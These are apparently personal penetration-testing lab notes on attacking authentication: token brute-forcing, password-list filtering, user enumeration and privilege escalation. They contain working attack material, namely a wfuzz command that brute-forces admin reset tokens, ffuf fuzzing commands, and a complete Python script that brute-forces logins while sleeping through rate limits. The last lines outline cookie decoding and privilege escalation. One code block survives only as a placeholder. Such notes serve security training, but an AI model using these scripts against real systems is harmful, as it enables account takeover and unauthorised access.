7.3 Token

Reset Token by Email

Short Token

wfuzz -z range,00000-99999 --ss "Valid" "https://tester.test.test/token.php?user=admin&token=FUZZ"

Weak Cryptography

https://github.com/GeorgeArgyros/Snowflake
https://download.openwall.net/pub/projects/php_mt_seed/

special char &

https://github.com/danielmiessler/SecLists/blob/master/Fuzzing/special-chars.txt


wget https://raw.githubusercontent.com/lukes/ISO-3166-Countries-with-Regional-Codes/master/all/all.csv

awk -F "," '{print$4}'

ffuf -request ./file -w file1 -w file 2

http://127.0.0.1:8080

 ffuf -request ./message.req -request-proto=http -w ./special-chars.txt:FUZZ1 -w ./code.txt:FUZZ2 -replay-proxy http://127.0.0.1:8080 


ffuf -request ./message.req -w ./special-chars.txt:FUZZ1 -w ./code.txt:FUZZ2 -request-proto=http


grep '^[[:upper:]]' /usr/share/wordlists/rockyou.txt | grep '.*[@$%].*' | grep '[0-9]
# Script

import requests
import time

Files containing the usernames and passwords

username_file = "username.txt"
password_file = "password.txt"

URL to which we will send the POST request

url = "http://94.237.48.48:54755/login.php"

Rate limit blocks for 30 seconds

lock_time = 30

Message that alerts us we hit the rate limit

lock_message = "Too many login failures"

Read and loop through username and password

with open(username_file, "r") as user_file, open(password_file, "r") as pass_file:
for username, password in zip(user_file, pass_file):
username = username.strip()
password = password.strip()

# Prepare POST data
data = {
"userid": username,
"passwd": password,
"submit": "submit"
}

# Make the HTTP POST request
res = requests.post(url, data=data)

# Handle generic credential error
if "Invalid credentials" in res.text:
print("[-] Invalid credentials: userid:{} passwd:{}".format(username, password))
# User and password were valid!
elif "Access granted" in res.text:
print("[+] Valid credentials: userid:{} passwd:{}".format(username, password))
break # Stop the loop once valid credentials are found
# Hit rate limit, let's say we have to wait 30 seconds
elif lock_message in res.text:
print("[-] Hit rate limit, sleeping 30")
# Sleep for the specified lock time plus an extra 0.5 seconds to be sure
time.sleep(lock_time + 0.5)

# Script
{{CODE_BLOCK_2}}


password complexity; grep robot.txt for triangulate passwords.
Python rate_limit.py
enumerate all users using msg page. try format support.(countrycode lower)
cyberchef to decode cookies (user:role) with step1 decode,step2decode, md5 hash
try for all admin.XX users to elevate privs.